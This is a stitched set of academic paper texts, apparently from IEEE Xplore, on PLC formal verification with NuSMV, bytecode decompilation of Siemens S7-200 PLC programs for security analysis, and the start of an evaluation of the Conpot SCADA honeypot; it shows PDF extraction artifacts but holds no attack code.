<AssignEnd > ::= j<AssignEnd >=<Var> < End> (9) Table IV EXCERPT OF THE GRAMMAR _L1 = (int1 == 20); _L2 = ((bool2 & bool1) & _L1); _L3 = (bool4 & bool3); _L4 = (_L3 | L2); result1 = _L4; result2 = _L4;A(; L int1; L 20; ==I; ); A bool1; A bool2; O; A bool3; A bool4; = result1; = result2;IL textFBD Figure 6. Example: IL and textFBD formats of an FBD program A. Constructing the textFBD format This is the rst step in verifying an FBD program. The textFBD representation is generated from the IL representa- tion of the program. IL is a machine-oriented PLC program- ming language, and each FBD program can be represented in IL. The range of textFBD statements is equivalent to that of FBD statements (cf. [12]). The IL format of an FBD program can be transformed to textFBD using a context-free grammar. An excerpt of it is shown in table IV. In the table, transformation rules are shown as they are used for transforming the network in gure 3. The IL format of the network is shown in gure 6. The example network may be considered as a complex statement consisting of a logical bit operation followed by two assignments (cf. rule (1) in table IV). A logical bit operation always has an output. Since no dangling lines may exist in a network, this output must be consumed in some way. In our case, the logical bit operation ends with assignments (cf. rule (7)). To enable using two such assignments, rules (8) and (9) are needed. Among the logical bit operations, we have a comparison of two integers (rule (6)). If the result of this operation is to be combined with the AND of two further Boolean variables, rst rule (3) and then rule (4) must be applied. An AND operation of two Boolean variables can be recognized using rules (2) and (4). Rule (5) describes how two logical bit operations can be combined with an ORoperation. The circuit variables in the textFBD le ( Livariables)are generated when connections between two operands are to be represented (cf. g. 6). Such a variable is generated when the recognition of an FBD operand is terminated. In our example, this means the following. As soon as the comparison is recognized, L1is generated. Then the recognition of the AND operation follows (until the ORoperation is read), with the subsequent generation of L2. In order to execute the ORoperation, the subsequent AND operation ( L3) is needed. Only thenL4is generated as a disjunction of L2and L3. Finally, the result of the logical bit operation in variable L4is assigned to the variables result1 andresult2 . On the basis of the grammar and the circuit variable concept, textFBD les are generated. B. Constructing the tFBD format Although the textFBD format of the FBD program can be transformed to NuSMV directly, we rst minimize the model in order to minimize the NuSMV state space. As shown in section III, we may do away with many circuit variables and thus reduce the model size. This substitution is expressed in the tFBD format of the FBD program. For constructing the tFBD format, only the list of FBD operations is needed which use local circuit variables. When transforming a textFBD le, each statement is checked whether it uses an operator from the list. If yes, it is copied into the tFBD le without change. Otherwise, we rst substitute the circuit variable (cf. g. 2). C. Constructing the NuSMV model Transforming a tFBD le to the NuSMV input language has been treated above in subsection III-C. We have shown how to represent tFBD statements by NuSMV transfor- mation rules. In order to complete a NuSMV model, the variable declarations have to be added (cf. g. 2). VI. C ONCLUSION In this paper, we present a method for the automated formal veri cation of PLC software. In particular, we look at FBD software. In order to verify the software, we propose to represent the graphical SPS programming language textually in two observationally equivalent ways: textFBD and tFBD. From the latter format, we derive a NuSMV model. Its state space is dramatically smaller than that of a NuSMV model directly derived from textFBD, so that applications of practical size can be model checked. The method was put to the test in the area of railway automation. In a case study, a component of an interlocking software, the logic controlling a point, was veri ed. The de- sign of the model as well as the construction of the NuSMV model were automated. With this successful project, we 447 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply. are con dent to pave the way for applying the method in practice. There are two important aspects in applying formal ver- i cation in practice: 1) the method should be applicable to relatively big and realistic models; 2) the execution times should be acceptable. The 1st point is satis ed by our method because the case study is directly taken from practice, without any omissions or abstractions which would make it more academic . As for the 2nd point, the execution times for setting up and transforming the model and veri- fying the speci cations are acceptable. It is true that they are greater than what simulations would take. But there is a fundamental difference between simulation and veri cation where the entire state space is being explored. Our realistic case study is an important step to convince not only railway engineers that automated formal methods are practical. The next step in applying our methods should be a state-based speci cation. This way, the advantage of our method would become even more evident. REFERENCES [1] W. Giessler, SIMATIC S7 SPS-Einsatzprojektierung und - programmierung . VDE Verlag GMBH, 2005. [2] International Electrotechnical Commission, International Standard 61131-3, Programmable controllers - Part 3: Pro- gramming languages , 2003. [3] A. Mader and H. Wupper, Timed automaton models for simple programmable logic controllers, in Proc. of 11th Euromicro Conference on Real Time Systems , 1999, pp. 114 122. [4] M. Heiner and T. Menzel, A Petri net semantics for the PLC language Instruction List, in Proc. of the International Workshop on Discrete Event Systems (WoDES) , 1998, pp. 161 166. [5] G. Canet, S. Couf n, J. j. Lesage, and A. Petit, Towards the automatic veri cation of PLC programs written in Instruction List, in IEEE International Conference on Systems, Man and Cybernetics , 2000, pp. 2449 2454. [6] O. Pavlovic, R. Pinger, M. Kollmann, and H. Ehrich, Princi- ples of formal veri cation of interlocking software, in Proc. of the 6th Symposium on Formal Methods for Automation and Safety in Railway and Automotive Systems (FORMS/FORMAT 2007) , E. Schnieder and G. Tarnai, Eds. GZVB, 2007.[7] O. Pavlovic, R. Pinger, and M. Kollmann, Automation of formal veri cation of PLC programs written in IL, in Proc. of 4th International Veri cation Workshop in connection with CADE-21 , B. Beckert, Ed. CEUR-WS.org, 2007. [8] , FBD-based PLC veri cation demonstrated on inter- locking software, in International Conference : ERTS EM- BEDDED REAL TIME SOFTWARE 2008 , S. 01/02/2008, Ed. [9] M. J. Song, S. R. Koo, and P.-H. Seong, Veri cation method for the FBD-style design speci cation using SDT and SMV, inIASTED Conf. on Software Engineering , 2004, pp. 206 211. [10] K. Y . Koh, E. K. Jee, S. J. Jeon, P. H. Seong, and S. D. Cha, A formal veri cation method of Function Block Diagrams with tool supporting: Practical experiences, in Annals of DAAAM for 2008 & Proceedings of the 19th International DAAAM Symposium , 2008. [11] Working with STEP 7 V5.3 , SIEMENS, 2004. [12] Function Block Diagram (FBD) for S7-300 and S7-400 Programming , SIEMENS, 2004. [13] A. Cimatti, E. Clarke, F. Giunchiglia, and M. Roveri, NuSMV: a new symbolic model veri er, International Journal on Software Tools for Technology Transfer , vol. 2, 2000. [14] O. Pavlovic, Formale Veri kation von Software f ur speicher- programmierbare Steuerungen mittels Model Checking . TU Braunschweig, 2009, Dissertation. [15] J. Pachl, Systemtechnik des Schienenverkehrs. Bahnbetrieb planen, steuern und sichern . Vieweg+Teubner, 2008. [16] R. Cavada, A. Cimatti, C. Jochim, G. Keighren, E. Olivetti, M. Pistore, M. Roveri, and A. Tchaltsev, NuSMV 2.4 User Manual , CMU and ITC-irst, http://www.nusmv.irst.itc.it. [17] R. Cavada, A. Cimatti, G. Keighren, E. Olivetti, M. Pistore, and M. Roveri, NuSMV 2.2 Tutorial , CMU and ITC-irst, http://www.nusmv.irst.itc.it. 448 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply.
A_technique_for_bytecode_decompilation_of_PLC_program.pdf
Program logical controllers (PLCs) are the kernel equipment of industrial control system (ICS) as they directly monitor and control industrial processes. Recently, ICS is suffering from various cyber threats, which may lead to significant consequences due to its inherent characteristics. In IT system, decompilation is a useful method to detect intrusion or to discovery vulnerabilities, however, it has yet not been developed in ICS. In this work, we present a technique to decompile the bytecode of PLC program. By introducing the instruction template and operand template, we propose a decompiling framework, which is validated by 11 PLC programs. In disassembling experiments, the present framework can cover all instructions with disassembling accuracy reaching 100%, this fully shows that our framework is able to effectively decompile the bytecode of PLC programs.
A Technique for Bytecode Decompilation of PLC Program Xuefeng LV, Yaobin Xie, Xiaodong Zhu, Lu Ren State Key Laboratory of Mathematical Engineering and Advanced Computing Zhengzhou, China [email protected], [email protected], [email protected], [email protected] Keywords programmable logical controller; bytecode; decompilation; mapping rules. I. I NTRODUCTION Programmable logical controller (PLC) is widely used as terminal control equipment in industrial control system (ICS), and is playing a central role in the whole system. With various software and hardware techniques from IT system applied to ICS, ICS is suffering from more and more cyber threats, thus physical isolation will not prev ent ICS from been attacked. This years, ICS cyber security incidents emerge in an endless stream[1-3], forcing researchers to focus their eyes on ICS security. In 2010, the Stuxnet [4] worm was detected to have invaded the Bushehr nuclear power station in Tran and have caused severe impact. Stuxnet finally destroyed the centrifuges by infecting PLCs and controlling the speed of centrifuges, this clearly shows that PLC can be attacked and can be maliciously exploited. Thankfully, security of PLC program is getting more and more attention[5-8]. Model checking[9] is a frequently-used method used for formalized verification of PLC programs[10-12], but it can only handle source code but not binary code, hence we cannot determine whether the running program is infected or not. Industrial intrusion detection[13-16] technology also has limitations to deal with complicated intrusion such as advanced persistent threat (APT). Therefore, it s necessary to have deep insight into the binary code of PLC program. It is hard to directly analyze the bytecode, however, it would be much easier if the bytecode were firstly decompiled. Decompilation has wide usage in IT system, while in ICS, as little attention has been paid to its security in the early times, there is few related studies. This paper proposes a technique for bytecode decompilation of PLC program. Since PLCs of various brands have different architecture and instruction set, we just take Simens S7-200 series PLCs as our research objects. The target language of decompilation is STL, a supported programming language of Simens S7-200 series PLCs. The remainder of this paper is organized as follows. Section 2 presents a simply introduction of PLC programming languages. Section 3 gives detailed analysis of the mapping rules between S7-200 instructions and the corresponding bytecode. In section 4, we provide a decompilation framework, and introduce the instruction template and operand template,some algorithms are also presented. Section 5 evaluates the presented framework by decompiling several PLC programs, the results are shown in a table. Finally Section 6 concludes the paper. II. OVERVIEEW OF PLC PROGRAMMING LANGUAGES User programs of PLC are designed by programmers according to the process control requirements using specific PLC programming languages. In accordance with the industrial control programming language standard IEC1131-3[17] established by International Electrotechnical Commission (IEC), PLC programming languages include Ladder Diagram (LD), Sequential Function Chart (SFC), Function Block Diagram (FBD), Instruction List (IL), and Structured Text (ST). Different kinds of PLCs support different programming languages. For example, Simens S7-200 series PLCs support LAD, STL and FBD. STL is a little similar to disassembly language, a STL instruction includes two parts, mnemonic and operand, here are some examples: LD I0.0; A I0.1; = Q1.0. S7- 200 s manual[18] defines a total of 246 kinds of mnemonics, which compose 19 classes of instructions, such as bitwise logical instruction, clock instruction, comparison instruction and transformation instruction. An operand is composed of operand sign and parameters. The operand sign can be further classed into master sign and auxiliary sign. Master sign decides which storage region the operand is stored, and auxiliary sign defines the operand size. While parameters decide the exact location of the operand. The master signs includes I, Q, S, SM, T, and so 978-1-4673-8979-2/17/$31.00 2017 IEEE 252 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:28 UTC from IEEE Xplore. Restrictions apply. on, and the auxiliary signs is made up of X (bit), B (byte), W (word) and D (dword). III. MAPPING RULES BETWEEN INSTRUCTION AND BYTECODE The relationship between instruction set and the corresponding bytecode set is one-to-one mapping. Suppose INSS denotes the instruction set, BCS denotes the bytecode set, fis the mapping function from INSS to BCS , then Instruction INSS ,ByteCode BCS , .st ByteCode fInstruction ; ByteCode BCS,Instruction INSS,.stInstruction 1fByteCode. To work out the mapping function f, we need to know the instruction set and the corresponding bytecode set of the target PLC. For instruction set we can find in a manual, while it needs some efforts to extract the bytecode set. 123 123 123123 ))) ) CompilingInstructions Bytecode Fig. 1. NOP instruction and the corresponding bytecode A. Start Position Determina tion of Code Segment Bytecode file is the executable file of PLC, and is organized according to a certain structure, in which the instruction bytecode is located at code segment and the data is at data segment. Since the structure of bytecode file is unknown, it is necessary to define the start position of the code segment. No-operation (NOP) instruction is a kind of PLC instructions that does not perform any operation, thus is suitable to accomplish this task. NOP 0; LDN M0.0; NOP 0; TON T33,100; NOP 0; LDW>=T33,40; NOP 0; = Q0.1; NOP 0; LD T33; NOP 0; = M0.0; NOP 0;70700000 F0001400F000A6 4400210064F0009 80490420028F006 240F0000A44F00 06400F000 InstructionsCompiling Bytecode Fig. 2. An example of NOP division method First, we write a source program containing only 4 consecutive instructions, after compilation, we extract the bytecode file. It is obviously that the bytecode file should contain 4 consecutive and identical bit sequences, find them in a binary editor, as shown in figure 1. The bytecode file includes 4 consecutive bit sequence FF 00 , this shows that FF 00 is the corresponding bytecode of instruction NOP 0 , and the start position of code segment i s w h e r e t h e f i r s t F F 00 sequence is located. B. Bytecode Extraction Through observation we find instruction storage order is the same as the correspongding bytecode, apparently, if the start position of the first instruction bytecode and the size of each instruction bytecode is known, it is easy to extract all the bytecode. However, instructions size are not always the same. To solve this problem, we propose a NOP-division method to extract batch of instruction bycode. NOP-division method employs NOP instructions to divide other instructions, thus we can determine the start and end position of each instruction bytecode through the bit sequences of NOP instruction. As shown in figure 2, we adopt NOP-division method to extract the corresponding bytecode of s ome instructions, like LDN M0.0 , TON T33, 100 , etc. INVB VB255 INVB LB0 INVB LB15 INVB LB63 INVB AC0 INVB AC1 INVB IB0 11110100 00001100 10000000 11111111 11110100 00001100 11100000 00000000 11110100 00001100 11100000 00001111 11110100 00001100 11100000 00111111 11110100 11001100 11110100 11011100 11110100 00001100 00000000 00000000 InsCode Instruction Fig. 3. INVB formed instruction and the InsCode C. Mnemonic Mapping Rules Each STL instruction has only one mnemonic, but may has several operands. For convenience, in this paper, we use InsCode to denote the bytecode corresponding to an instruction, OpCode to denote the corresponding bytecode of mnemonic, and OprandCode to denote the corresponding bytecode of operand. To determine the Opcode , we should fix the mnemonic, and change the operands in one experiment. In this way, we can make sure that the unchanged part of InsCode must be the Opcode , and the remainder is the OperandCode . For a specific mnemonic, we change the operands to structure some instructions, and extract the InsCode using NOP-division method, then we can analyze the mapping rules of menmomic. Since operands diverse in numbers, we discuss the problem in three cases, instructions with no operand, instructions with one operand and instructions with several operands. (1) Instructions with no operand For instructions with no operand, InsCode equals to OpCode . For example, the InsCode of instruction EU is 11100001 , and the OpCode is also 11100001 . (2) Instructions with one operands For instructions with one operand, we change the operand in one experiment and study the changes of InsCode . Take mnemonic INVB for instance, we structures some 253 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:28 UTC from IEEE Xplore. Restrictions apply. instructions and extract the InsCode , the result is shown in figure 3. We can see that the first byte of all InsCode are the same, thus we conclude that the OpCode of INVB is 11110100 . (3) Instructions with several operands For instructions with several operands, using similar method as the second situation, change only one operand in one experiment, the InsCode part that has no change all the time is the OpCode . D. Operands Mapping Rules It s more difficult to analyze operands mapping rules due to various operand kinds and uncertain operand number. Operand kinds of s7-200 PLCs include immediate data, string and memorizer. For immediate and string operand, s7-200 PLCs adopt a direct coding strategy, so by direct decoding the OperandCode we can easily obtain the operands, therefore we only discuss memorizer operands in this paper. Memorizer operands contain memorizer symbol, byte (word, or dword) number, may also contain bit number when the second field is byte number. For example, operand I10.1 contains memorizer symbol I , byte number 10 and bit number 1 . If an instruction contains only one operand, OperandCode is the remainder of InsCode except for the OpCode . For instance, the InsCode o f i n s t r u c t i o n I N V B V B 2 5 5 i s a s follows: INVB VB255 11110100 00001100 10000000 11111111 From previous discussion we know the OpCode of INVB is 11100100 , therefore the gray part of the InsCode identifies the OperandCode of operand VB255 . For instructions with multiple operands, fix one operand and the mnemonic and change other operands in one experiment, the unchanged part except for the OpCode corresponds to the fixed operand. During our research we find the operand type is defined by a field whose size may be 4 bits, 1 byte or 2 bytes, which we denote as OperandType . Taking an instruction LDB= IB0, IB0 as example, its InsCode is 10010001 00000000 00000000 00000000 00000000 00000000 , t h e g r a y p a r t i s t h e OperandType of the first operand IB0 . To confirm an OperandType , a lot of experiments is needed. The OperandType 0000 indicates the m e m o r i z e r s y m b o l i s o n e o f I , Q , M , S , S M , V and L . The size of OperandType is related to operand type and operand number. Memorizer symbol, byte (word, or dword) number and bit number all map to a specific field in OperandCode . In this paper, we employ masks to represent the position of the fields in InsCode, and by AND operation we can obtain the corresponding coding. For example, byte number coding (ByteNC) = OperandCode & byte number coding mask (ByteNCM). Through ByteNC we can uniquely determine the byte number. Word(or dword) number and bit number can be determined in the same way. If bit number does not exist, then bit number co ding mask (BitNCM) is NULL. IV. I NSCODE DECOMPILATION FRAMEWORK As previously described, STL is kind of like assembly language, decompiling of STL programs can be inspired by disassembly algorithms. Classical disassembly algorithms mainly include linear scanning algorithm[18] and recursive traversal algorithm[19]. The linear scanning algorithm disassembles instructions one after another from the first byte. During disassembling, the size of each instruction is calculated, and is used to determine the start position of next instruction. It can cover all the code segment but does not consider the condition that data is mixed in code. While the recursive traversal algorithm disassembles instructions according to circumstance how the instructions are referenced, it can separate code and data, yet it is more complicated than the first one. Since data and code are separated in PLC bytecode file, we adopt the liner scanning algorithm for the sake of simplicity. The steps are as follows. (1) Position pointer IpStart points to start of the code segment. (2) Attempt to match instruction form where IpStart points to, and obtain the instruction size n. (3) If step 2 succeeds, decompile n bytes after where IpStart points to. If fails, then exit. (4) Assign IpStart +n to IpStart (5) Judge whether the value of IpStart is beyond the end of code segment Step (3) is the kernel of the whole system, it decompiles each piece of InsCode. To provide a convenient for InsCode decompilation, we present instruction template and operand template, upon which some decompiling algorithms are also designed. InsCode decompilation framework is shown in figure 4. Instruction template libraryOperand template libraryInscode OpCode OperandCode Mnemonic OperandPointer of current instruction template Algorithm1 Algorithm2Algorithm3 Fig. 4. InsCode decompiling framework The framework can be divided into two parts, mnemonic resolution and operand resolution. First, it resolves the mnemonic on the basis of instruction template library and algorithm1 and obtain the pointer of the current instruction template. Then it gains OperandType of all operands through algorithm 2. Finally, it resolves operands depending on the OperandType , operand template library and algorithm 3. The 254 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:28 UTC from IEEE Xplore. Restrictions apply. resolved mnemonic and operands make up a complete instruction. A. Instruction Template We place all the instructions that have same mnemonic into one category, called an instruction class. For every instruction in an instruction class, we use a same structure to describe them, which we calls an instruction template. The instruction template contains information about mnemonic and operands. The mnemonic information include mnemonic type, OpCode , OpCode mask, and so on. The OpCode can be obtained through AND operation between OpCode mask and InsCode. While the operand template includes operand number, OperandType mask list, start position of the OperandCode in InsCode, etc. Among which the OperandType mask list contains all the OperandType masks. We will get OperandCode if we do AND operation between OperandType mask and OperandCode . The data structure of instruction template is as follows. struct Ins{ string Memonic; //the mnemonic type int OpCode; //the OpCode long long OpMask; //the OpCode mask int OperandNum; //the operand number OperandTypeMask *OperandTypeMask; //pointer of the OprandType mask list int Pos // start position of the OperandCode Inst *Ptr //a pointer points to next instruction template }; Among struct Ins the OperandTypeMask is defined as follows. Struct OperandTypeMaskt{ long long Mask; //the OperandType mask OperandTypeMask *ptr; //pointer points to next list node }; Take mnemonic LDB = for example, its instruction template is described in table 1. Algorithm 1 : INSTRUCTION TEMPLATE BASED MNEMONIC RESOLUTION Input : InsCode Output : Memonic, InsPtr Begin 1 CurrentIns = InstHead //CurrentIns points to the head of instruction template 2 while CurrentIns != NULL do 3 tmpOpcode = InsCode & CurrentIns->OpMask; 4 if tmpOpcode == CurrentIns->OpCode then //match success! 5 Memonic = CurrentIns->Mnemonic; 6 InsPtr = CurrentIns; 7 break; 8 end if 9 CurrentIns = CurrentIns->Ptr; 10 end while End B. Operand Templates In this paper all operands that has same operand sign are grouped into one class, and we take use of one of operand templates to describe them. Since same operand may have different coding style after different mnemonics, we have to build one template for every mnemonic, this takes a lot of time. An operand template contains operand sign, operand sign coding mask (OSCM), Operand sign coding (OSC), etc. OSC can be obtained by doing AND operation between OSCM and OperandCode , number and bit number can be obtained in the same way. An operand template is organized as a list, whose node is structured as follows. Struct Operand{ string Sign; //the operand sign int SignMask; //the OSCM int SignCode //the OSC int ByteMask; //Byte word/dword number mask int BitMask //Bit number mask Operand * ptr //pointer points to next operand template }; Take operand sign IB as example, its operand template is described in table 2. Algorithm 2: OBTAIN Nth OperandType Input : InsPtr ByteCode n Output : OperandType Begin 1 P = InsPtr ->OperandTypeMask; 2 i = 0; 3 while i < n do 4 P=P ->Ptr; 5 i++; 6 end while 7 OperandType = InsCode & P ->Mask; End C. Decompilation Process On the basis of the proposed templates, we present a template-based decompilation technique. In this section, we introduce decompilation process with the aid of some algorithms. The process mainly includes two parts: mnemonic resolution and operand resolution. Algorithm 3 OPERAND RESOLUTION Input : InsPtr OperandCode, OperandType Output : OperandName, OperandByte, OperandBit Begin 1 Ptr = Select(OperandType); // choose an operan d template according to the OperandType, function Select () returns the head pointer of the operand template. 2 while Ptr != NULL do 3 tmpCode = OperandCode & Ptr ->SignMask; 4 if tmpCode == Ptr->SignCode then //match success! then 5 OperandSign = Ptr ->Sign; //resolve the operand sign. 6 OperandByte = OperandCode& Ptr ->ByteMask; // extract byte (word/dword) number. 7 OperandBit = OperandCode& Ptr->Bit-Mask; //extract bit number. 8 break; 9 end if 10 P= P ->Ptr; 11 end while End 1) Mnemonic Resolution We perform mnemonic resolution utilizing algorithm1. Algorithm 1 takes a piece of InsCode as input , and outputs mnemonic type and a pointer. It traverses instruction template list, and for each node, it performs AND operation between the InsCode and the operand mask CurrentIns -> OpMask , then compares the result with CurrentIns->OpCode . if consistent, assigns the current pointer to InsPtr , then the algorithm exits. 255 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:28 UTC from IEEE Xplore. Restrictions apply. We can use InsPtr to find the matching instruction template and then resolve the InsCode ,CurrentIns->Mnemonic is the corresponding mnemonic type; Otherwise, it continues to traverse the next node. 2) Operand Resolution After mnemonic resolution, we can obtain some operand information stored in the instruction template. Parameter InsPtr->OperandNum indicates the number of operands that source instruction has, if it equals to zero, then we realize that the source instruction has no operand, therefore there is no need for operand resolution. Otherwise, we should go on. To resolve an operand, the first thing to do is obtaining the OperandType , this can be done through AND operation between InsCode and the OperandTypeMask, the second one is acquired from the instruction template. Algorithm 2 shows how to obtain nth OperandType . When we have gained all the OperandType s, for every Operand, we choose an operand template that matches its OperandType , then we traverse the template and discover the node that is in accordance with the OperandCode . If we have found one matching node, we then stop traversing and use the matching node to resolve the operand. If not, we continue to traverse next node. The kernel of operand resolution is shown in algorithm 3. The operand sign, byte (word/dword) number and bit number make up a complete operand. Algorithm 3 may be employed several times since there may be more than one operand. TABLE I. A N EXAMPLE OF MNEMONIC TEMPLATE TABLE STYLES Members Description Value Mnemonic Mnemonic type LDB= OpCode OpCode 91 OpMask OpCode mask F00000000000 OperandNum Operand number 2 Pos Start position of the OperandCode 16 TABLE II. A N EXAMPLE OF OPERAND TEMPLATE Members Description Value Sign Operand sign IB SignMask Operand sign coding mask (OSCM) F000 SignCode Operand sign coding (OSC) 00 ByteMsak Byte word/dword number coding mask OFFF BitMask Bit number coding mask (BitNCM) NULL TABLE III. D ECOMPILING RESULTS OF 11 PLC PROGRAMS NameInstruction numberCode coverage /% Accuracy /% Time consume /ms Gas transmission 3688 100 95 51.7 Fountain 39 100 100 0.58 Manipulator 91 100 100 1.28 Traffic lights 71 100 100 1.03 Three-phase asynchronous 164 100 100 2.43 Water tower 37 100 100 0.56 Tower light 83 100 100 1.16 Four-layer elevator 613 100 100 9.13 Liquid mixing 46 100 100 0.69 Mail sorting 232 100 100 3.29 Rolling mill 36 100 100 0.58 V. DECOMPILATION EXPERIMENTS To validate the efficiency of the proposed framework and algorithms, we have conducted several experiments. However, there exists a problem that there is not a classical testing program typical for Simens PLCs, nor for other manufacturers. Indeed, we have not found similar work up till now. Consequently, we alternatively conduct decompilation experiments on 11 programs form the internet[20], the results in shown in table 3. The configuration of testing platform is Intel (r) Core (TM) i7-4710Q CPU @2.5GHz, 8.00GB RAM. As we can see, all the code coverage and decompilation accuracy is 100%, this shows that all the InsCode has been correctly decompiled, and proves that linear scanning algorithm is suit for PLC bytecode decompiling. Mainly of the results can be attributed to rather simple structure of PLC bytecode and uncomplicated coding strategy. The total number of all instructions is 5100, and the total processing time is 72.43 milliseconds, thus, the average processing time of a piece of InsCode is 0.0142 milliseconds. We are unable to evaluate the efficiency just according to the time consumption as we cannot find a team that is doing the same work, but apparently it will only take a few seconds even for a big program that contains thousands of instructions, so the result is acceptable depending on our understanding that PLC program is usually small. After the text edit has been completed, the paper is ready for the template. Duplicate the template file by using the Save 256 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:28 UTC from IEEE Xplore. Restrictions apply. As command, and use the naming convention prescribed by your conference for the name of your paper. In this newly created file, highlight all of the contents and import your prepared text file. You are now ready to style your paper; use the scroll down window on the left of the MS Word Formatting toolbar. VI. CONCLUSION Security of PLC program is very important to the whole industrial control system, while current security strategy has limitation to deal with the PLC program being infected. Decompilation of PLC program will help for security analysis of PLC program. Our proposed framework has gained an acceptable time consumption, and all the bytecode has been correctly decompiled, this fully shows that linear scanning algorithm is well suit for decompilation of PLC program. While the decompilation framework is based on instruction template and operand template for information storage, and information is organized in the form of lists, so the space efficiency is less satisfactory. The framework also works for other species of PLCs, but the templates should be newly designed, and the data structure should also be adjusted. R EFERENCES [1] M. Cheminod, L. Durante, and A. Valenzano, Review of Security Issues in Industrial Networks, IEEE Transactions on In dustrial Informatics, vol. 9, no. 1, pp. 277-293, 2013. [2] P. Jie, and L. Li, "Industrial Control System Security." pp. 156-158. [3] R. S. H. Piggin, "Development of industrial cyber security standards: IEC 62443 for SCADA and Industrial Control System security." pp. 1-6. [4] R. Langner, Stuxnet: Dissecting a Cyberwarfare Weapon, IEEE Security & Privacy Magazine, vol. 9, no. 3, pp. 49-51, 2011. [5] G. P. H. Sandaruwan, P. S. Ranaweera, and V. A. Oleshchuk, "PLC security and critical infrastructure protection." pp. 81 - 85. [6] S. A. Milinkovic, and L. R. Lazic, "Industrial PLC security issues." pp. 1536-1539. [7] H. Senyondo, P. Sun, R. Berthier, and S. Zonouz, "PLCloud: Comprehensive power grid PLC security monitoring with zero safety disruption." [8] G. Cebrat, "Web Based Home Automation: Application Layer Based Security for PLC Controller." pp. 302-307. [9] E. A. Emerson, The Beginning of Model Checking: A Personal Perspective : Springer-Verlag, 2008. [10] B. Schlich, J. R. Brauer, J. R. Wernerus, and S. Kowalewski, "Direct model checking of PLC programs in IL." pp. 28-33. [11] O. Pavlovic, and H. D. Ehrich, "Model Checking PLC Software Written in Function Block Diagram." pp. 439-448. [12] S. Mclaughlin, "A Trusted Safety Verifier for Process Controller Code." [13] B. Zhu, and S. Sastry, "SCADA-specific Intrusion Detection/Prevention Systems: A Survey and Taxonomy." [14] N. Erez, and A. Wool, Control variable classification, modeling and anomaly detection in Modbus/TCP SCADA systems, International Journal of Critical Infr astructure Protection, vol. 10, no. C, pp. 59-70, 2015. [15] J. Jiang, and L. Yasakethu, "Anomaly Detection via One Class SVM for Protection of SCADA Systems." pp. 82-88. [16] B. Kroll, D. Schaffranek, S. Schriegel, and O. Niggemann, "System modeling based on machine learning for anomaly detection and predictive maintenance in industrial plants." pp. 275-280. [17] Part, 3: Programming Languages, IEC 1131 -3, International Electrotechnica l Commission - Geneva, vol. 21, no. 1, pp. 27-51, 1993. [18] S. E. Modules, C. Cpu, P. I. R. Mode, I. t. S, B. E. O. A. Program, K. T. C. Ngh , and T. . Ho , Siem ens: S7-200 Programmable Controller System Manual, Tailieu Vn . [19] M. Xu, Research on Static Disassembly Algorithm, Computer & Digital Engineering , 2007. [20] http://download.csdn.net/detail/bretch/2574792 . 257 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:28 UTC from IEEE Xplore. Restrictions apply.
SCADA_honeypots_An_in-depth_analysis_of_Conpot.pdf
Supervisory Control and Data Acquisition (SCADA) honeypots are key tools not only for determining threats which pertain to SCADA devi ces in the wild, but also for early detection of potential mali cious tampering within a SCADA device network. An analysis of one such SCADA honeypot, Conpot, is conducted to determine its viability as an effective SCADA emulating device. A long-term analysis is conducted and a simple scoring mechanism lev eraged to evaluate the Conpot honeypot.
SCADA Honeypots An In-depth Analysis of Conpot Arthur Jicha, Mark Patton, and Hsinchun Chen University of Arizona Department of Management Information Systems Tucson, AZ 85721, USA [email protected], mpatton@ema il.arizona.edu, [email protected] Keywords Supervisory Control and Data Acquisition systems, honeypots, Conpot, network security I. INTRODUCTION In a world where the value of information is ever increasing, hackers are consiste ntly targeting governments, corporations, and individuals to obtain valuable secrets, proprietary data, and personally identifiable information (PII). Honeypots can be used to better understand the landscape of where these attacks are orig inating. Honeypots can be leveraged not only to conduct research on threats in the wild, but also to notify an organization if a potential threat is within one s network. Supervisory Control and Data Acquisition (SCADA) systems are a critical ta rget, and with the advent of SCADA honeypots, attempts to access or tamper with SCADA devices can be preemptively identified and analyzed. A. Background SCADA Honeypots attempt to mimic an active SCADA system. A typical SCAD A system is composed of four parts: a central computer (host), a number of field-based remote measurement and control units known as Remote Terminal Units (RTUs), a wide area telecommunications system to connect them, and an operator interface to allow the operator to access the system [1]. Conpot is a low-interactive SCADA honeypot and serves the purpose of being extremely easy to implement. Serbanescu et al., for example, found th at Conpot would support the simulation of hypertext transfer protocol (HTTP), Modbus (a serial communication protocol), and Simple Network Management Protocol (SNMP; used for network management), and the integration of programmable logic controllers (PLC) [2]. The Co npot project by The Honeynet Project was released in May 2013. Conpot utilizes a logging system to monitor any changes th at are made by intruders. The honeypot logs events of HTTP, SNMP and Modbus services with millisecond accuracy an d offers basic tracking information such as source address, request type, and resource requested in the case of HTTP [3]. B. Research Gap In a literature review of SCADA honeypots, a gap was identified regarding the analysis of the effectiveness of the various honeypots. Studies were found that detailed the interactions occurring with a given honeypot, i.e., Digital Bond Honeynet and Conpot; however, studies of the actual effectiveness of any given honeypot have not been conducted. The closest approach to this fi eld of study was carried out by Fronimos, et. al., whose study focused on evaluating the usability and performance of Low Interaction Honypots, but did not examine the specifics of SCADA honeypot efficacy [4]. A more detailed look at the efficacy of SCADA honeypots that takes into account their uniq ue requirements has not been conducted prior to this res earch. This paper performs a detailed evaluation of the Conpot SCADA Honeypot. II.E XPERIMENT APPROACH To conduct a full analysis of the SCADA honeypot Conpot, a virtualized image was created and used in multiple Amazon Web Services (AWS) zones. The SCADA honeypots ran from March 25 th to April 11th and the logs were subsequently analyzed. An additional log set was pulled April 27 th for further analysis. The following section outlines the steps for setup and process for creating instances of Conpot. Installation of Conpot is quite simple; however, certain dependencies are necessary for it to fully function. Due to the age of some of the required p ackages, repositories must be manually added. Ubuntu 12.04, an open source software platform used for various mobile and other devices, was used as the base operating system for a micro-instance within AWS, after configuring basic se ttings and conducting updates. A. Experiment Setup After successfully obtaining th e Conpot start screen, the AWS micro-instance was shut down so that an image could be created. Utilizing the Create Image function within AWS, the image was then added to the Images 